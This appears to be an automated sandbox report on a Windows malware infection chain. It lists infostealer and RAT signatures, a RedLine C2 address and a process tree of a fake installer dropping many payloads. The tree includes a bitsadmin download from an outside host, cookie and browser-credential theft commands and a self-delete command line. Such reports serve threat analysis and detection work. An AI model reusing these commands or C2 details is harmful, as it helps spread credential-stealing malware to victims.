Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    346s
  • max time network
    1798s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-04-2021 04:33

General

Malware Config

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 35 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2812
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2472
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2436
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1900
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1444
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1300
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:864
                      • C:\Users\Admin\AppData\Roaming\fwiaugb
                        C:\Users\Admin\AppData\Roaming\fwiaugb
                        2⤵
                          PID:2708
                        • C:\Users\Admin\AppData\Roaming\bbiaugb
                          C:\Users\Admin\AppData\Roaming\bbiaugb
                          2⤵
                            PID:4616
                            • C:\Users\Admin\AppData\Roaming\bbiaugb
                              C:\Users\Admin\AppData\Roaming\bbiaugb
                              3⤵
                                PID:4408
                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4044
                            • C:\Users\Admin\AppData\Local\Temp\is-Q1IJ1.tmp\Install.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-Q1IJ1.tmp\Install.tmp" /SL5="$80060,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:2708
                              • C:\Users\Admin\AppData\Local\Temp\is-EMD0E.tmp\Ultra.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-EMD0E.tmp\Ultra.exe" /S /UID=burnerch1
                                3⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3656
                                • C:\Program Files\Microsoft Office\QHVYKEOSGL\ultramediaburner.exe
                                  "C:\Program Files\Microsoft Office\QHVYKEOSGL\ultramediaburner.exe" /VERYSILENT
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3364
                                  • C:\Users\Admin\AppData\Local\Temp\is-TN2LD.tmp\ultramediaburner.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-TN2LD.tmp\ultramediaburner.tmp" /SL5="$80030,281924,62464,C:\Program Files\Microsoft Office\QHVYKEOSGL\ultramediaburner.exe" /VERYSILENT
                                    5⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:1484
                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                      6⤵
                                      • Executes dropped EXE
                                      PID:1568
                                • C:\Users\Admin\AppData\Local\Temp\39-12927-2ed-b1689-04c2f2f96bfa2\Saezhapaevudae.exe
                                  "C:\Users\Admin\AppData\Local\Temp\39-12927-2ed-b1689-04c2f2f96bfa2\Saezhapaevudae.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3944
                                • C:\Users\Admin\AppData\Local\Temp\40-09883-da6-ec6ae-dedfe08f5ffc2\Fenywyjaho.exe
                                  "C:\Users\Admin\AppData\Local\Temp\40-09883-da6-ec6ae-dedfe08f5ffc2\Fenywyjaho.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:2112
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsmsloev.0er\skipper.exe /s & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4464
                                    • C:\Users\Admin\AppData\Local\Temp\xsmsloev.0er\skipper.exe
                                      C:\Users\Admin\AppData\Local\Temp\xsmsloev.0er\skipper.exe /s
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4708
                                      • C:\Users\Admin\AppData\Local\Temp\867630183.exe
                                        C:\Users\Admin\AppData\Local\Temp\867630183.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:4664
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          8⤵
                                            PID:4108
                                        • C:\Users\Admin\AppData\Local\Temp\543425804.exe
                                          C:\Users\Admin\AppData\Local\Temp\543425804.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4928
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            8⤵
                                              PID:5732
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              8⤵
                                                PID:6084
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\xsmsloev.0er\skipper.exe & exit
                                              7⤵
                                                PID:5620
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 0
                                                  8⤵
                                                  • Runs ping.exe
                                                  PID:2644
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4ivvcp4.zck\001.exe & exit
                                            5⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:5076
                                            • C:\Users\Admin\AppData\Local\Temp\r4ivvcp4.zck\001.exe
                                              C:\Users\Admin\AppData\Local\Temp\r4ivvcp4.zck\001.exe
                                              6⤵
                                                PID:5100
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h2wjey0n.2xb\gpooe.exe & exit
                                              5⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4100
                                              • C:\Users\Admin\AppData\Local\Temp\h2wjey0n.2xb\gpooe.exe
                                                C:\Users\Admin\AppData\Local\Temp\h2wjey0n.2xb\gpooe.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Suspicious use of WriteProcessMemory
                                                PID:4328
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5032
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5976
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:4368
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecu4art1.k1p\google-game.exe & exit
                                                5⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:4332
                                                • C:\Users\Admin\AppData\Local\Temp\ecu4art1.k1p\google-game.exe
                                                  C:\Users\Admin\AppData\Local\Temp\ecu4art1.k1p\google-game.exe
                                                  6⤵
                                                    PID:4168
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1344
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c3lpn1ah.imu\md1_1eaf.exe & exit
                                                  5⤵
                                                    PID:4656
                                                    • C:\Users\Admin\AppData\Local\Temp\c3lpn1ah.imu\md1_1eaf.exe
                                                      C:\Users\Admin\AppData\Local\Temp\c3lpn1ah.imu\md1_1eaf.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      PID:5540
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahqjwwp4.dw1\HookSetp.exe /silent & exit
                                                    5⤵
                                                      PID:2848
                                                      • C:\Users\Admin\AppData\Local\Temp\ahqjwwp4.dw1\HookSetp.exe
                                                        C:\Users\Admin\AppData\Local\Temp\ahqjwwp4.dw1\HookSetp.exe /silent
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:5632
                                                        • C:\Users\Admin\AppData\Roaming\8933122.exe
                                                          "C:\Users\Admin\AppData\Roaming\8933122.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:1744
                                                        • C:\Users\Admin\AppData\Roaming\4423209.exe
                                                          "C:\Users\Admin\AppData\Roaming\4423209.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:68
                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:6104
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgg4jbjt.vmi\askinstall39.exe & exit
                                                      5⤵
                                                        PID:5268
                                                        • C:\Users\Admin\AppData\Local\Temp\sgg4jbjt.vmi\askinstall39.exe
                                                          C:\Users\Admin\AppData\Local\Temp\sgg4jbjt.vmi\askinstall39.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5868
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            7⤵
                                                              PID:5492
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:4168
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cbigsz0.rno\requête.exe & exit
                                                          5⤵
                                                            PID:4724
                                                            • C:\Users\Admin\AppData\Local\Temp\1cbigsz0.rno\requête.exe
                                                              C:\Users\Admin\AppData\Local\Temp\1cbigsz0.rno\requête.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:5640
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:2920
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                  parse.exe -f json -b firefox
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:4292
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                  parse.exe -f json -b chrome
                                                                  8⤵
                                                                    PID:5592
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                    parse.exe -f json -b edge
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5204
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixkla1tt.ver\SunLabsPlayer.exe /S & exit
                                                              5⤵
                                                                PID:4512
                                                                • C:\Users\Admin\AppData\Local\Temp\ixkla1tt.ver\SunLabsPlayer.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\ixkla1tt.ver\SunLabsPlayer.exe /S
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  PID:4840
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:3744
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4216
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4836
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5396
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:3740
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:5188
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                • Checks for any installed AV software in registry
                                                                                PID:5688
                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                7⤵
                                                                                • Download via BitsAdmin
                                                                                PID:1608
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                PID:5692
                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:1004
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4300
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:1552
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4572
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:4356
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:5864
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                          7⤵
                                                                                            PID:5484
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                              8⤵
                                                                                                PID:5396
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:5212
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:2308
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:1708
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:2016
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa4F28.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:4128
                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                        7⤵
                                                                                                          PID:5892
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bj14pur5.3fw\005.exe & exit
                                                                                                      5⤵
                                                                                                        PID:5764
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bj14pur5.3fw\005.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\bj14pur5.3fw\005.exe
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5384
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdfzglx3.dsy\GcleanerWW.exe /mixone & exit
                                                                                                        5⤵
                                                                                                          PID:4944
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0b2zzsx4.caz\toolspab1.exe & exit
                                                                                                          5⤵
                                                                                                            PID:5744
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0b2zzsx4.caz\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\0b2zzsx4.caz\toolspab1.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5256
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0b2zzsx4.caz\toolspab1.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\0b2zzsx4.caz\toolspab1.exe
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5624
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ts1jylwv.uij\c7ae36fa.exe & exit
                                                                                                            5⤵
                                                                                                              PID:4972
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4168
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ts1jylwv.uij\c7ae36fa.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\ts1jylwv.uij\c7ae36fa.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:2320
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:748
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        PID:4508
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Modifies registry class
                                                                                                        PID:5276
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4172
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:4404
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4236
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
